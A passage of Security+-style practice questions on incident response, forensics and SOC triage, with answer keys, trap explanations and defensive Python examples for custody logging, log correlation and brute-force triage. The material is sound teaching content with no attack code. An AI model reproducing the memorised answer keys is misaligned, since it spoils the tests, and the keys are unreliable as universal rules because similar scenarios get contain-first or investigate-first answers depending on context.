The first priority in a suspected ransomware outbreak is containment to prevent lateral spread and further encryption. Disconnecting network cables and disabling Wi-Fi immediately isolates the affected workstations from the network, stopping the ransomware from communicating with its command-and-control (C2) server or encrypting additional systems. This aligns with the NIST SP 800-61 incident response lifecycle, where containment precedes eradication and recovery.

Exam trap

The trap here is that candidates often jump to eradication (wiping drives) or notification (calling law enforcement) first, forgetting that containment is the immediate priority to stop the outbreak from spreading across the network.

How to eliminate wrong answers

Option A is wrong because immediately wiping hard drives destroys forensic evidence and prevents analysis of the ransomware variant, infection vector, and scope of compromise, which is critical for understanding and preventing future incidents. Option C is wrong because contacting law enforcement is a notification step that occurs after containment and initial analysis; delaying containment to call authorities allows the ransomware to continue spreading and causing more damage.

122
Multi-Select · hard

A server is suspected of being used for lateral movement after the SOC notices dozens of failed SSH logons, then a successful login from a new source IP, followed by new outbound SMB connections to internal hosts. The system is still running. Which two items should be collected first before any reboot or remediation? Select two.

Select 2 answers
A. A current list of logged-in users and active sessions, because it shows who has access right now.
B. Live network connection information, because it shows current remote targets and suspicious channels.
C. The server’s warranty status, because hardware replacement may be needed later.
D. A fresh operating system patch, because updating quickly reduces all risk.
E. A user satisfaction survey, because affected staff can describe what they noticed.
Answers: A, B

Active session information is volatile and can disappear on reboot. It helps identify whether a legitimate user, compromised account, or attacker shell is currently present on the server. That makes it one of the highest-value items to capture first.

Why this answer

Option A is correct because capturing a current list of logged-in users and active sessions provides immediate visibility into which accounts are currently authenticated and potentially being used by an attacker for lateral movement. This data is volatile and would be lost upon reboot, making it critical to collect before any remediation. In this scenario, the successful SSH login from a new source IP suggests an attacker may have established a foothold, and knowing active sessions helps identify compromised accounts and ongoing access.

Exam trap

The trap here is that candidates may prioritize remediation actions like patching or hardware checks over preserving volatile forensic evidence, failing to recognize that live user sessions and network connections are the most time-sensitive data to collect before any system change.

123
MCQ · medium

Security receives a company-owned laptop connected to an insider theft investigation. Before the device is transported to the evidence locker, what is the BEST action to support chain of custody?

A. Factory reset the laptop so investigators can start from a clean system
B. Seal the device in an evidence bag and record each handoff with signatures
C. Remove the hard drive and image it without any documentation
D. Leave the laptop unlocked so the next analyst can inspect it quickly
Answer: B

Sealing and documented handoffs create a defensible custody record and reduce the chance of tampering.

Why this answer

Option B is correct because sealing the device in an evidence bag and recording each handoff with signatures establishes a documented, unbroken chain of custody. This ensures the integrity of the evidence by preventing tampering and providing a verifiable record of who handled the device and when, which is critical for admissibility in legal proceedings.

Exam trap

The trap here is that candidates may think a factory reset (Option A) helps investigators start clean, but it actually destroys evidence, while proper sealing and documentation (Option B) is the only method that preserves evidence integrity for legal proceedings.

How to eliminate wrong answers

Option A is wrong because factory resetting the laptop destroys all potential evidence, including files, logs, and metadata, making it impossible for investigators to recover data relevant to the theft. Option C is wrong because removing the hard drive and imaging it without documentation violates chain of custody principles, as there is no record of who performed the action or when, compromising evidence integrity. Option D is wrong because leaving the laptop unlocked risks unauthorized access, alteration, or deletion of evidence, breaking the chain of custody and potentially rendering the evidence inadmissible.

124
Multi-Selecteasy

A security team receives a suspicious email attachment and wants to inspect its behavior safely before any user opens it. They also want a tool that can isolate the same threat if it reaches an endpoint. Which two tools or capabilities best fit this need? Select two.

Select 2 answers
A.EDR remote isolation capability on the endpoint.
B.Sandboxing the attachment before release to users.
C.DLP monitoring to prevent accidental data leakage.
D.A WAF filtering web requests to the application.
E.Port mirroring on a switch for traffic review.
Answers: A, B

EDR can isolate the host while preserving its state for later investigation.

Why this answer

A is correct because EDR remote isolation capability allows the security team to immediately disconnect an endpoint from the network if the suspicious attachment is executed, preventing lateral movement and data exfiltration. B is correct because sandboxing the attachment before release to users provides a safe, isolated environment to analyze the file's behavior without risking the production network. Together, these tools address both proactive analysis (sandbox) and reactive containment (EDR isolation).

Exam trap

The trap here is that candidates may confuse DLP's data loss prevention role with threat analysis or endpoint containment, overlooking that DLP does not execute files or isolate systems.

125
MCQ · medium

A security analyst detects an encrypted outbound connection from a web server to an unknown IP address. The connection is persistent and occurs every 5 minutes. What is the MOST appropriate first step for the analyst to take?

A.Disconnect the server from the network immediately.
B.Block the IP address at the perimeter firewall.
C.Review the server's process list and logs to identify the source.
D.Escalate the incident to the incident response team.
Answer: C

This is the correct first step. By examining the process list and logs (e.g., system, firewall, and application logs), the analyst can determine the specific process or service responsible for the outbound connection, assess whether it is malicious, and gather evidence for further investigation or escalation.

Why this answer

Option C is correct because the first step in investigating an unknown encrypted outbound connection is to identify the process or service responsible for initiating it. Reviewing the server's process list and logs allows the analyst to determine whether the connection is legitimate (e.g., a scheduled update or backup) or malicious (e.g., a beacon from implanted malware). Without this visibility, actions like blocking or disconnecting could disrupt legitimate services or alert an attacker prematurely.

Exam trap

The trap here is that candidates often jump to containment (disconnect or block) without first performing local analysis, failing to recognize that the initial step in incident response is always identification and scoping before containment.

How to eliminate wrong answers

Option A is wrong because immediately disconnecting the server from the network is an aggressive containment step that should only be taken after confirming malicious activity; it can cause unnecessary downtime and data loss if the connection is benign. Option B is wrong because blocking the IP address at the perimeter firewall is a reactive measure that does not address the root cause—the unknown process on the server—and the attacker could simply use a different IP or domain. Option D is wrong because escalation to the incident response team is premature before gathering initial evidence; the analyst should first perform local investigation to confirm the nature of the connection and collect relevant data for a proper handoff.

126
Multi-Select · hard

An investigator receives a suspect laptop that may be needed in court. The goal is to create a forensic image without changing the original drive contents. Which three actions best support chain of custody and evidence integrity? Select three.

Select 3 answers
A.Use a hardware write blocker during acquisition so the original disk cannot be modified.
B.Record cryptographic hash values for both the original media and the forensic image.
C.Document every transfer of the laptop, including who had custody, when, and why.
D.Browse the original disk using the operating system file explorer to confirm the case folder is present.
E.Store the suspect drive and the forensic copy in the same unlocked folder to simplify access.
Answers: A, B, C

A write blocker prevents accidental or intentional writes to the original media during imaging. That is one of the most important controls for protecting evidence integrity. It helps show that the original drive remained unchanged while the forensic image was created.

Why this answer

A hardware write blocker is essential because it physically prevents any write commands from reaching the suspect drive at the SATA/IDE or USB level, ensuring the original disk's contents remain unaltered during acquisition. This is a foundational requirement for maintaining evidence integrity in forensic imaging, as any modification could render the evidence inadmissible in court.

Exam trap

The trap here is that candidates may think browsing the original disk is harmless or that storing evidence together is convenient, but both actions violate core forensic principles of preserving original evidence and maintaining a clear chain of custody.
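The two evidence-handling questions above (the sealed-bag handoff record and the hashed forensic image) come together in the following added example, which is not part of the original page. It keeps a custody record with one entry per transfer, hashes the source media once, and accepts a forensic copy only if its hash matches; the evidence tag, seal number and file contents are constructed placeholders.

```python
from __future__ import annotations

import hashlib
import json
import tempfile
from dataclasses import asdict, dataclass, field
from datetime import datetime, timezone
from pathlib import Path


def sha256_of(path: Path, chunk: int = 1 << 20) -> str:
    """Hash the file in chunks so a multi-gigabyte image never has to fit in RAM."""
    h = hashlib.sha256()
    with path.open("rb") as f:
        for block in iter(lambda: f.read(chunk), b""):
            h.update(block)
    return h.hexdigest()


@dataclass
class CustodyRecord:
    """One evidence item plus every documented transfer of it."""
    item_id: str
    description: str
    original_sha256: str            # hash of the source media, taken behind the write blocker
    handoffs: list[dict] = field(default_factory=list)

    def handoff(self, from_person: str, to_person: str, reason: str, seal_id: str) -> None:
        # Each transfer records who, to whom, when, why, and the tamper-evident seal number.
        self.handoffs.append({
            "from": from_person,
            "to": to_person,
            "reason": reason,
            "seal_id": seal_id,
            "time_utc": datetime.now(timezone.utc).isoformat(timespec="seconds"),
        })

    def verify_image(self, image_path: Path) -> bool:
        """A forensic copy is only usable if it hashes identically to the original."""
        return sha256_of(image_path) == self.original_sha256

    def to_json(self) -> str:
        return json.dumps(asdict(self), indent=2)


def demo(workdir: Path | None = None) -> tuple[CustodyRecord, bool, bool]:
    """Constructed scenario: a stand-in 'drive', a faithful image, and a tampered image."""
    workdir = workdir or Path(tempfile.mkdtemp(prefix="custody-demo-"))
    original = workdir / "suspect_drive.bin"
    original.write_bytes(b"\x00" * 4096 + b"case folder present" + b"\xff" * 512)

    record = CustodyRecord(
        item_id="EV-0001",  # constructed evidence tag, not from the page
        description="Suspect laptop SSD, imaged through a hardware write blocker",
        original_sha256=sha256_of(original),
    )
    record.handoff("Evidence technician", "Forensic examiner", "Acquisition", "SEAL-1183")

    faithful = workdir / "suspect_drive_image.raw"
    faithful.write_bytes(original.read_bytes())
    tampered = workdir / "suspect_drive_tampered.raw"
    tampered.write_bytes(original.read_bytes()[:-1] + b"\x00")  # a single byte differs

    return record, record.verify_image(faithful), record.verify_image(tampered)


if __name__ == "__main__":
    rec, ok, bad = demo()
    print(rec.to_json())
    print("faithful image verifies:", ok, "| tampered image verifies:", bad)
```

The one-byte difference in the tampered copy is enough to fail verification, which is exactly why the hash of the original is recorded before anyone works with the copy.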

127
Multi-Select · hard

A SIEM correlation rule fires for a Microsoft 365 executive mailbox. At 02:14, the account signs in from a new country. At 02:17, the mailbox gets a forwarding rule that sends all mail to an external address. The user says they did not travel and did not create any rules. Which two log sources should the analyst review first to confirm whether this is account takeover or token abuse? Select two.

Select 2 answers
A.Identity provider sign-in logs, because they show source IP, MFA status, and session creation details.
B.Mailbox audit logs, because they record rule creation, forwarding changes, and other post-login mail actions.
C.DHCP lease logs, because they identify the internal workstation that first received the suspicious email.
D.Print server logs, because mailbox forwarding often causes documents to be printed unexpectedly.
E.Physical badge-access logs, because they prove whether the user was in the office when the login occurred.
Answers: A, B

Identity provider sign-in logs are the fastest way to validate where the session came from, whether MFA succeeded, and whether a token or session was issued. That helps distinguish a legitimate login from suspicious access. They also provide the baseline needed to correlate later mailbox activity with the same identity.

Why this answer

Option A is correct because identity provider sign-in logs (e.g., Azure AD sign-in logs) capture the source IP address, MFA status, and session details. In this scenario, reviewing these logs can reveal if the sign-in at 02:14 came from an unusual IP or lacked MFA, indicating a potential account takeover rather than token abuse.

Exam trap

The trap here is that candidates may overlook the need to check both sign-in and mailbox audit logs, assuming one log source alone can distinguish between account takeover and token abuse, when in fact the combination of identity provider logs and mailbox audit logs is required to correlate the sign-in session with the rule creation action.
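The correlation this question describes, sign-in logs paired with mailbox audit events, as an added example that is not part of the original page. The records are constructed and simplified (real identity-provider and mailbox audit logs carry many more fields), the known-country baseline is assumed, and the MFA-based classification is a triage heuristic, not a rule.

```python
from __future__ import annotations

from dataclasses import dataclass
from datetime import datetime, timedelta

# Countries this user has signed in from before (constructed baseline).
KNOWN_COUNTRIES: dict[str, set[str]] = {"exec@example.com": {"US"}}


@dataclass(frozen=True)
class SignIn:
    """Subset of an identity-provider sign-in record."""
    user: str
    time: datetime
    ip: str
    country: str
    mfa_satisfied: bool
    session_id: str


@dataclass(frozen=True)
class MailboxEvent:
    """Subset of a mailbox audit record."""
    user: str
    time: datetime
    operation: str          # e.g. "New-InboxRule"
    session_id: str
    forward_to: str | None = None


def correlate(signins: list[SignIn], events: list[MailboxEvent],
              window: timedelta = timedelta(minutes=10)) -> list[dict]:
    """Pair each sign-in from a new country with any forwarding rule created
    for the same mailbox shortly afterwards, and classify the likely cause."""
    findings = []
    for s in signins:
        if s.country in KNOWN_COUNTRIES.get(s.user, set()):
            continue  # familiar location, nothing to pair
        for e in events:
            if e.user != s.user or e.operation != "New-InboxRule" or not e.forward_to:
                continue
            if not (s.time <= e.time <= s.time + window):
                continue
            # Heuristic (an assumption, not a rule): a new-country sign-in that did not
            # satisfy MFA points at stolen credentials; one that did, yet the user
            # disputes, points at a replayed token or hijacked session.
            kind = "token_or_session_abuse" if s.mfa_satisfied else "credential_compromise"
            findings.append({
                "user": s.user,
                "signin_time": s.time.isoformat(),
                "signin_ip": s.ip,
                "country": s.country,
                "rule_time": e.time.isoformat(),
                "forward_to": e.forward_to,
                "same_session": e.session_id == s.session_id,
                "likely_kind": kind,
            })
    return findings


def demo() -> list[dict]:
    """Constructed events mirroring the scenario: new-country sign-in at 02:14,
    external forwarding rule at 02:17, plus an earlier benign sign-in."""
    def t(hh: int, mm: int) -> datetime:
        return datetime(2024, 5, 2, hh, mm)

    signins = [
        SignIn("exec@example.com", t(1, 30), "192.0.2.10", "US", True, "sess-aaa"),
        SignIn("exec@example.com", t(2, 14), "203.0.113.45", "FR", False, "sess-bbb"),
    ]
    events = [
        MailboxEvent("exec@example.com", t(2, 17), "New-InboxRule", "sess-bbb",
                     forward_to="collector@external.example"),
        MailboxEvent("exec@example.com", t(9, 5), "MailItemsAccessed", "sess-aaa"),
    ]
    return correlate(signins, events)


if __name__ == "__main__":
    for finding in demo():
        print(finding)
```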

128
MCQ · medium

A system administrator must run a weekly patch-and-restart job on 80 Linux servers without logging in interactively. The job should be repeatable, auditable, and limited to only the required maintenance commands. What is the best approach?

A.Share a root SSH key with the operations team so anyone can run the job.
B.Use a configuration management tool with a dedicated service account and restricted sudo permissions.
C.Have each administrator log in manually and run the commands from an interactive shell.
D.Create a local root account on every server for maintenance tasks.
Answer: B

This supports repeatable automation, centralized auditing, and least privilege by allowing only the needed maintenance actions.

Why this answer

B is correct because configuration management tools (e.g., Ansible, Puppet, or SaltStack) allow you to define a repeatable, auditable patch-and-restart job using a dedicated service account with restricted sudo permissions. This approach enforces the principle of least privilege, logs all actions via the tool's job history, and eliminates the need for interactive login, meeting all requirements for automation, auditability, and command restriction.

Exam trap

The trap here is that candidates may choose Option A (shared root SSH key) because it seems convenient for automation, but they overlook the critical security and auditability requirements that make configuration management with a restricted service account the only correct choice.

How to eliminate wrong answers

Option A is wrong because sharing a root SSH key violates the principle of least privilege and non-repudiation — anyone with the key can execute arbitrary commands as root without an audit trail of who ran what. Option C is wrong because manual interactive login on 80 servers is not repeatable, introduces human error, and fails to provide a centralized audit log; it also violates the requirement to avoid interactive login. Option D is wrong because creating a local root account on every server increases the attack surface, makes key management and auditing nearly impossible, and directly contradicts the need for a restricted, auditable process.

129
MCQ · medium

A security analyst detects unusual outbound traffic from a workstation to an external IP address known for command and control. The analyst has verified the alert and wants to contain the threat. According to the NIST SP 800-61 incident response process, which of the following steps should the analyst take FIRST?

A.Disconnect the workstation from the network
B.Perform a forensic analysis of the workstation
C.Reimage the workstation
D.Alert the system administrator
Answer: A

This is correct because it directly implements containment by isolating the compromised workstation, preventing further data exfiltration or lateral movement.

Why this answer

According to NIST SP 800-61, the first step in containment during incident response is to prevent further damage by isolating the compromised system. Disconnecting the workstation from the network immediately stops the outbound command-and-control traffic, preventing data exfiltration and further compromise. This aligns with the 'containment' phase before any analysis or remediation occurs.

Exam trap

The trap here is that candidates often confuse the order of incident response phases, choosing forensic analysis (Option B) first instead of containment, because they mistakenly believe evidence preservation must precede network isolation.

How to eliminate wrong answers

Option B is wrong because performing a forensic analysis is part of the 'eradication' or 'post-incident' phase, not the first containment step; analyzing the system while it is still connected risks further data loss or attacker interference. Option C is wrong because reimaging the workstation destroys evidence and is a remediation step that should only occur after containment and forensic preservation. Option D is wrong because alerting the system administrator is a communication step that may happen in parallel, but the immediate technical containment action—disconnecting the network—takes priority to stop active malicious traffic.

130
MCQ · medium

A security analyst notices unusual outbound traffic from a server that normally only communicates with internal clients. The traffic is encrypted and goes to an external IP address not on any blocklists. The analyst also finds a new scheduled task on the server that runs a PowerShell script. Which of the following best describes the analyst's immediate next step in the incident response process?

A.Disconnect the server from the network to contain the potential breach.
B.Wipe the server and restore from a known good backup.
C.Run a full antivirus scan on the server to identify malware.
D.Inform the legal department and law enforcement.
Answer: A

This is correct because containment is the immediate priority in incident response to stop the threat from spreading or causing more harm. Disconnecting the network cable or disabling the network interface is a simple and effective containment action.

Why this answer

According to standard incident response frameworks such as NIST SP 800-61, containment is one of the first and most critical steps after detecting a potential compromise. The unusual encrypted outbound traffic and the unauthorized scheduled task are strong indicators of compromise (IOCs). Disconnecting the server from the network immediately helps prevent further data exfiltration, lateral movement, or additional damage.

Other actions, such as running a scan, wiping the server, or notifying legal, are performed later in the process after containment and evidence preservation.

131
MCQ · easy

A laptop is suspected of being compromised, and the responder wants to preserve useful evidence before shutting it down. What should be done first?

A.Power off the laptop immediately to stop all attacker activity.
B.Capture volatile data such as memory and running processes if possible.
C.Install a new antivirus product before collecting evidence.
D.Reimage the laptop so the user can return to work quickly.
Answer: B

Capturing volatile data is the best first step when preserving evidence matters. Memory can contain malware code, encryption keys, active network sessions, and signs of lateral movement that disappear after shutdown. In incident response, responders try to preserve the most time-sensitive evidence before disrupting the system, as long as doing so is safe and approved.

Why this answer

Option B is correct because volatile data (e.g., RAM contents, running processes, network connections) is lost when the laptop is powered off. Capturing this data first preserves critical evidence of the attacker's current activity, such as malware in memory or active network connections, which is essential for forensic analysis. This aligns with the forensic principle of order of volatility, where the most volatile data is collected first.

Exam trap

The trap here is that candidates often think immediate shutdown stops the attack, but CompTIA tests the forensic principle that volatile data must be captured first to preserve evidence that disappears on power loss.

How to eliminate wrong answers

Option A is wrong because immediately powering off the laptop destroys volatile data (e.g., memory, running processes, network connections) that may contain critical evidence of the compromise, such as active malware or attacker commands. Option C is wrong because installing a new antivirus product modifies the system state (e.g., writes files, changes registry entries), potentially overwriting or destroying existing evidence, and is not a forensic best practice. Option D is wrong because reimaging the laptop completely wipes all data, including evidence of the compromise, making forensic analysis impossible and violating evidence preservation protocols.

132
Multi-Select · medium

A SIEM rule flags a Linux server because it makes outbound HTTPS connections to the same cloud IP every 15 minutes. The server runs an approved patch agent that should check in on a regular schedule. Which two checks best validate whether the alert is a false positive? Select two.

Select 2 answers
A.Compare the process name, parent process, and digital signature to the approved agent baseline.
B.Verify the destination domain and certificate chain against vendor documentation.
C.Assume the traffic is benign because it happens on a fixed schedule.
D.Suppress all alerts from the host permanently after this one event.
E.Stop collecting logs from the server so the same alert does not recur.
Answers: A, B

Correct because a known process tree and valid signature are strong indicators that the behavior belongs to the sanctioned patch agent. This helps confirm whether the activity matches expected system behavior.

Why this answer

Option A is correct because comparing the process name, parent process, and digital signature against the approved agent baseline directly validates that the traffic originates from the legitimate patch agent and not from malware masquerading as the agent. This is a standard host-based validation technique to confirm the source process integrity before investigating network alerts.

Exam trap

The trap here is that candidates may think a fixed schedule alone is sufficient to dismiss the alert (Option C), but CompTIA expects you to validate both the source process integrity and the destination legitimacy before concluding a false positive.
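The host-side and destination-side checks from Options A and B, as an added example that is not part of the original page. The approved-agent baseline (process name, permitted parent, binary hash, documented check-in hosts, certificate issuer) and both observed connections are constructed; on a real host the observation would come from the EDR process tree and the network sensor, and the hash would be verified against the vendor's published value or the package manager.

```python
from __future__ import annotations

import hashlib
from dataclasses import dataclass


@dataclass(frozen=True)
class ApprovedAgent:
    """What vendor documentation and the host baseline say the agent looks like."""
    process_name: str
    allowed_parents: frozenset[str]
    binary_sha256: str                 # hash of the installed binary, verified at install time
    destination_hosts: frozenset[str]  # documented check-in endpoints
    tls_issuer_cn: str                 # issuer of the endpoint's server certificate


@dataclass(frozen=True)
class ObservedConnection:
    """What the EDR process tree and the network sensor saw for one beacon."""
    process_name: str
    parent_name: str
    binary_sha256: str
    dest_host: str
    tls_issuer_cn: str


def triage(obs: ObservedConnection, baseline: ApprovedAgent) -> tuple[str, list[str]]:
    """Return a verdict plus every attribute that deviates from the baseline."""
    mismatches: list[str] = []
    if obs.process_name != baseline.process_name:
        mismatches.append(f"process name {obs.process_name!r} != {baseline.process_name!r}")
    if obs.parent_name not in baseline.allowed_parents:
        mismatches.append(f"unexpected parent {obs.parent_name!r}")
    if obs.binary_sha256 != baseline.binary_sha256:
        mismatches.append("binary hash does not match the approved build")
    if obs.dest_host not in baseline.destination_hosts:
        mismatches.append(f"undocumented destination {obs.dest_host!r}")
    if obs.tls_issuer_cn != baseline.tls_issuer_cn:
        mismatches.append(f"certificate issuer {obs.tls_issuer_cn!r} is not the vendor's")
    # A fixed schedule on its own never counts as evidence either way.
    verdict = "likely_false_positive" if not mismatches else "escalate"
    return verdict, mismatches


def demo() -> tuple[tuple[str, list[str]], tuple[str, list[str]]]:
    """Constructed baseline, one matching beacon, and one impostor with the same name."""
    good_hash = hashlib.sha256(b"patchd-1.4.2-approved-build").hexdigest()  # constructed
    baseline = ApprovedAgent(
        process_name="patchd",
        allowed_parents=frozenset({"systemd"}),
        binary_sha256=good_hash,
        destination_hosts=frozenset({"updates.vendor.example"}),
        tls_issuer_cn="Vendor Issuing CA",
    )
    # Beacon that matches the baseline on every attribute.
    benign = ObservedConnection("patchd", "systemd", good_hash,
                                "updates.vendor.example", "Vendor Issuing CA")
    # Same process name and the same 15-minute cadence, but everything else is off:
    # spawned by a shell, different binary, unlisted destination, unknown issuer.
    impostor = ObservedConnection("patchd", "bash",
                                  hashlib.sha256(b"not-the-agent").hexdigest(),
                                  "203.0.113.7", "Unknown Issuer")
    return triage(benign, baseline), triage(impostor, baseline)


if __name__ == "__main__":
    for verdict, why in demo():
        print(verdict, why)
```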

133
MCQ · easy

Before applying a critical patch to a production application server, which action best reduces the risk of extended downtime if the patch fails?

A.Apply the patch immediately without testing so the system is protected sooner.
B.Create a verified backup or rollback plan before making the change.
C.Disable logging so the patch process uses fewer resources.
D.Postpone the patch indefinitely until all business users request it.
Answer: B

A verified backup or rollback plan is the best safeguard because it gives the team a way to recover quickly if the patch causes instability. In patch management, resilience matters as much as speed. Planning for restoration before the change reduces downtime, supports change control, and helps the business continue operating if the update introduces problems.

Why this answer

Creating a verified backup or rollback plan before applying a critical patch ensures that if the patch causes unexpected failures or incompatibilities, the system can be restored to its previous stable state quickly. This directly reduces the risk of extended downtime by providing a reliable recovery path, which is a fundamental principle of change management and risk mitigation in production environments.

Exam trap

The trap here is that candidates may think immediate patching (Option A) is always the best security practice, but the question specifically asks about reducing the risk of extended downtime if the patch fails, not about security speed, so the correct answer focuses on recovery preparedness.

How to eliminate wrong answers

Option A is wrong because applying the patch immediately without testing bypasses validation and increases the likelihood of a failure that could cause extended downtime, as there is no rollback plan or backup to recover from. Option C is wrong because disabling logging does not reduce downtime risk; it actually hinders troubleshooting by removing forensic evidence needed to diagnose patch failures, and resource savings are negligible compared to the risk of extended outage. Option D is wrong because postponing the patch indefinitely leaves the system vulnerable to known exploits, and waiting for all business users to request it is impractical and violates security best practices for timely patch management.

134
MCQ · medium

A help desk technician reports that a user's account was locked out three times overnight. The security team reviews the authentication logs and discovers that the lockouts resulted from failed login attempts originating from a single external IP address, each attempt using a slightly different variation of the user's password. Which of the following should the security analyst do FIRST?

A.Block the external IP address at the perimeter firewall.
B.Disable the user account and require a password reset.
C.Investigate the user's recent activity for signs of compromise.
D.Increase the account lockout threshold to prevent future lockouts.
Answer: C

Correct. The analyst should first gather contextual information about the user's account, recent successful logins, and any other anomalous behavior. This investigation determines whether the account was actually breached and informs subsequent containment and remediation steps.

Why this answer

Option C is correct because the pattern of failed login attempts from a single external IP using password variations suggests a brute-force or password-spraying attack. The security analyst must first investigate the user's recent activity to determine if the account was successfully compromised or if the attacker gained access via a successful login attempt before the lockouts occurred. This aligns with the incident response process, where identification and analysis precede containment actions like blocking IPs or resetting passwords.

Exam trap

The trap here is that candidates may jump to immediate containment (blocking the IP or disabling the account) without first verifying whether the attack succeeded, which violates the incident response principle of 'identify before contain' and could disrupt legitimate access or miss evidence of a breach.

How to eliminate wrong answers

Option A is wrong because blocking the external IP at the perimeter firewall is a containment step that should be taken after confirming the attack is malicious and not a false positive (e.g., a legitimate user with a forgotten password). Option B is wrong because disabling the user account and requiring a password reset is premature without first verifying that the account was actually compromised; the lockouts may have prevented any unauthorized access. Option D is wrong because increasing the account lockout threshold weakens security posture and does not address the root cause; it may allow more brute-force attempts before lockout, increasing the risk of successful password guessing.
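The investigation step this question puts first, checking whether the source of the failed attempts ever logged in successfully, as an added example that is not part of the original page. The log lines are constructed in a simplified sshd-style format; the lockout threshold of five is an assumption.

```python
from __future__ import annotations

import json
import re
from collections import Counter

# Constructed, simplified sshd-style lines; real logs differ in format.
AUTH_LOG = """\
2024-05-02T01:12:04Z host1 sshd[4021]: Failed password for jsmith from 198.51.100.23 port 51200 ssh2
2024-05-02T01:12:09Z host1 sshd[4021]: Failed password for jsmith from 198.51.100.23 port 51201 ssh2
2024-05-02T01:12:15Z host1 sshd[4021]: Failed password for jsmith from 198.51.100.23 port 51202 ssh2
2024-05-02T01:12:20Z host1 sshd[4021]: Failed password for jsmith from 198.51.100.23 port 51203 ssh2
2024-05-02T01:12:26Z host1 sshd[4021]: Failed password for jsmith from 198.51.100.23 port 51204 ssh2
2024-05-02T03:40:11Z host1 sshd[4188]: Failed password for jsmith from 198.51.100.23 port 51980 ssh2
2024-05-02T03:40:17Z host1 sshd[4188]: Failed password for jsmith from 198.51.100.23 port 51981 ssh2
2024-05-02T03:40:22Z host1 sshd[4188]: Failed password for jsmith from 198.51.100.23 port 51982 ssh2
2024-05-02T03:40:28Z host1 sshd[4188]: Failed password for jsmith from 198.51.100.23 port 51983 ssh2
2024-05-02T03:40:33Z host1 sshd[4188]: Failed password for jsmith from 198.51.100.23 port 51984 ssh2
2024-05-02T08:02:41Z host1 sshd[5301]: Accepted password for jsmith from 10.20.30.40 port 60010 ssh2
"""

LINE = re.compile(
    r"^(?P<ts>\S+) \S+ sshd\[\d+\]: (?P<result>Failed|Accepted) password for "
    r"(?P<user>\S+) from (?P<ip>\S+) port \d+"
)


def triage_lockouts(log_text: str, user: str, lockout_threshold: int = 5) -> dict:
    """Summarise failed and successful logins for one user and answer the question
    the analyst must settle before containing: did the guessing source ever get in?"""
    failures: Counter[str] = Counter()
    successes: list[tuple[str, str]] = []
    for line in log_text.splitlines():
        m = LINE.match(line)
        if not m or m["user"] != user:
            continue
        if m["result"] == "Failed":
            failures[m["ip"]] += 1
        else:
            successes.append((m["ts"], m["ip"]))

    # Sources that generated enough failures to trip the lockout at least once.
    guessing_sources = {ip for ip, n in failures.items() if n >= lockout_threshold}
    successes_from_guessers = [s for s in successes if s[1] in guessing_sources]
    other_successes = [s for s in successes if s[1] not in guessing_sources]

    if successes_from_guessers:
        next_step = "treat as compromised: disable account, reset credentials, block source"
    elif guessing_sources:
        next_step = "no success from guessing source; review other logins, then block source"
    else:
        next_step = "no brute-force pattern; check for a legitimate forgotten-password cause"

    return {
        "user": user,
        "failures_by_ip": dict(failures),
        "guessing_sources": sorted(guessing_sources),
        "successes_from_guessers": successes_from_guessers,
        "other_successes": other_successes,
        "next_step": next_step,
    }


if __name__ == "__main__":
    print(json.dumps(triage_lockouts(AUTH_LOG, "jsmith"), indent=2))
```

The remaining success from an internal address is the "other login" the analyst still has to account for before deciding the account was untouched.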

135
Multi-Select · medium

A finance workstation is suspected of running malware. It is still powered on, the user is logged in, and the network cable is connected. Which two actions best preserve volatile evidence before shutdown? Select two.

Select 2 answers
A.Capture RAM or a volatile memory image before the system is powered off
B.Record running processes, open network connections, and logged-on users
C.Shut the workstation down immediately and restart it cleanly
D.Run a disk defragmentation utility to prepare for imaging
E.Uninstall the suspected malware before collecting any evidence
Answers: A, B

Memory can contain running processes, network sessions, encryption keys, and malware artifacts that disappear on shutdown.

Why this answer

Option A is correct because capturing RAM or a volatile memory image preserves data that is lost when the system is powered off, such as running processes, encryption keys, and network connections. This is a fundamental step in forensic incident response to ensure volatile evidence is not destroyed before analysis.

Exam trap

The trap here is that candidates may think immediate shutdown is safe or that disk defragmentation is a valid preparation step, but both destroy or alter evidence, violating forensic preservation principles.

136
MCQ · medium

An EDR console alerts that powershell.exe launched with an encoded command on a finance workstation, and a minute later the host begins making repeated outbound connections to an unfamiliar IP address. What is the best initial response?

A.Run a full antivirus scan first and leave the workstation online so the user can keep working.
B.Isolate the workstation through the EDR platform and preserve logs and volatile evidence for investigation.
C.Power off the workstation immediately to ensure the malicious process stops.
D.Create a permanent firewall rule that allows the unfamiliar IP address so you can observe more traffic.
Answer: B

Encoded PowerShell combined with outbound beaconing is a strong indicator of active malicious behavior. Isolating the endpoint through EDR contains the incident while preserving the host’s state for analysis. This approach is better than pulling the plug because it reduces attacker activity without unnecessarily destroying volatile evidence. The analyst can then collect logs, memory, and process details before remediation or reimaging.

Why this answer

Option B is correct because isolating the workstation via the EDR platform stops the immediate threat (the malicious outbound connections) while preserving volatile evidence (e.g., running processes, network connections, memory contents) and logs for forensic analysis. This aligns with the incident response principle of containment before eradication, and EDR isolation typically uses a host-based firewall rule to block all traffic except to the EDR management server, ensuring the host remains accessible for investigation.

Exam trap

The trap here is that candidates confuse immediate containment (isolation) with eradication (an antivirus scan), or mistake powering off for evidence preservation, but the SY0-701 exam emphasizes that isolation via EDR is the best initial response because it stops the threat without destroying volatile data.

How to eliminate wrong answers

Option A is wrong because running a full antivirus scan while the host remains online allows the attacker to continue exfiltration or lateral movement, and antivirus may miss fileless or encoded PowerShell attacks that never touch disk. Option C is wrong because powering off the workstation destroys volatile evidence (e.g., memory-resident malware, active network connections, process trees) and may prevent forensic analysis of the attack chain. Option D is wrong because creating a permanent firewall rule to allow the unfamiliar IP address would actively assist the attacker by ensuring uninterrupted command-and-control communication, violating the containment principle.

137
Multi-Select · hard

A SOC analyst reviews an EDR alert showing powershell.exe launched with an encoded command, then immediately connected to an unfamiliar IP address and spawned rundll32.exe. The user is still logged in and the machine may still contain evidence needed for investigation. Which two actions should the analyst take first to contain the incident while preserving evidence? Select two.

Select 2 answers
A.Isolate the endpoint using EDR network containment or a quarantine policy.
B.Disable the user account and revoke active sessions or tokens for that identity.
C.Reboot the workstation immediately to clear any malicious process from memory.
D.Run a full vulnerability scan before taking any other action.
E.Delete the suspicious email from the mailbox to remove the original payload.
Answers: A, B

This stops the suspected malware from communicating or spreading while preserving the disk and volatile evidence for later analysis.

Why this answer

Option A is correct because isolating the endpoint via EDR network containment or quarantine policy immediately stops the malicious process from communicating with the command-and-control (C2) server at the unfamiliar IP address, preventing data exfiltration and lateral movement. This action preserves the volatile evidence in memory (e.g., the spawned rundll32.exe process) and on disk, allowing forensic analysis without the risk of the attacker destroying evidence remotely.

Exam trap

